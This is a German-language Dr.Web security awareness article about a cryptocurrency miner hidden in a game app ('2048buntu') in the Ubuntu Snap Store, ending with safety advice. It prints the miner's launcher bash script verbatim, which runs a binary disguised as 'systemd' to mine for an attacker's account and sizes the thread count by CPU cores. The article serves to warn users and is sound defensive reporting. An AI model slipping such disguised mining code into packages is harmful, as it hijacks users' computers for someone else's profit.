Sie verwenden einen veralteten Browser!

Die Seite kann inkorrekt angezeigt werden.

Ungeladene Gäste

Незваные гости

Andere Ausgaben dieser Rubrik (5)
  • Zu Favoriten hinzufügen
    Registerkarte hinzufügen

«My First Ferrari»

Gelesen: 155 Kommentare: 0 Rating: 4

Encoder für Linux sind keine Neuheit unserer Zeit. Ohne viel Lob für uns selbst auszusprechen, waren wir allerdings die ersten, die einen solchen Encoder unter Linux gefunden haben. Miner für Linux gibt es auch. Es ist nichts Neues, dass es Cyber-Kriminelle auf Kosten von Anwendern auf dieses Betriebssystem abgesehen haben.

In der beliebten Linux-Distribution Ubuntu gibt es seit kurzem ein neues App-Format – das snap-Paket. Es gibt auch einen neuen Snap Store, der dem Windows Store sehr ähnlich ist. Der Haken hier: die Apps werden nicht auf Schadcode geprüft.

Ein vorsichtiger Nutzer entdeckte im Code einer Spiel-App einen Schädling zum Schürfen von Kryptowährung und ein Skript, welches das automatische Starten dieses Schädlings auslöste.

Ein offener Quellcode ist eine gute Sache. Dieser sieht so aus:


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

Niemand nahm jedoch Notiz davon. Ähnliche Mining-Trojaner und Skripts gab es auch in anderen Apps desselben Autors. Der Schadcode schürfte unter dem Namen „My first Ferrari“ Kryptowährung für den Übeltäter. Leider gibt es im Ubuntu Snap Store keinen Download-Zähler, sodass man bis heute nicht weiß, ob der Kriminelle auf diese Weise für seinen ersten Ferrari verdienen konnte.

Dr.Web empfiehlt

  1. Bleiben Sie wachsam, wenn Sie Linux benutzen. Auch wenn jeder den offenen Quellcode prüfen kann, bedeutet dies nicht, dass der Quellcode überhaupt geprüft wurde. Häufig verlässt man sich auf andere, während sich eine Sicherheitslücke oder ein Schadcode auf eine Vielzahl von Workstations und Servern verbreitet.
  2. Prüfen Sie entweder den Code jeder App, die Sie installieren wollen, oder machen Sie von einer Virenschutzsoftware Gebrauch.

Erhalten Sie Dr.Web Punkte für Ihre Stimme! (1 Stimme = 1 Dr.Web Punkt)

Melden Sie sich an und sichern Sie sich 10 Dr.Web Punkte für die Ausgabe.

[Twitter]

Aufgrund von technischen Einschränkungen von VK und Facebook können wir keine Dr.Web Punkte vergeben.

Ihre Meinung ist uns wichtig

10 Dr.Web Punkte für einen Kommentar zur Ausgabe am Tag der Veröffentlichung oder 1 Dr.Web Punkt an einem anderen Tag. Kommentare werden automatisch veröffentlich und im Nachhinein moderiert. Kommentierungsregeln.

Um einen Kommentar zu publizieren, müssen Sie sich über Ihr Konto auf der Webseite von Doctor Web einloggen. Wenn Sie noch kein Konto haben, können Sie es anlegen.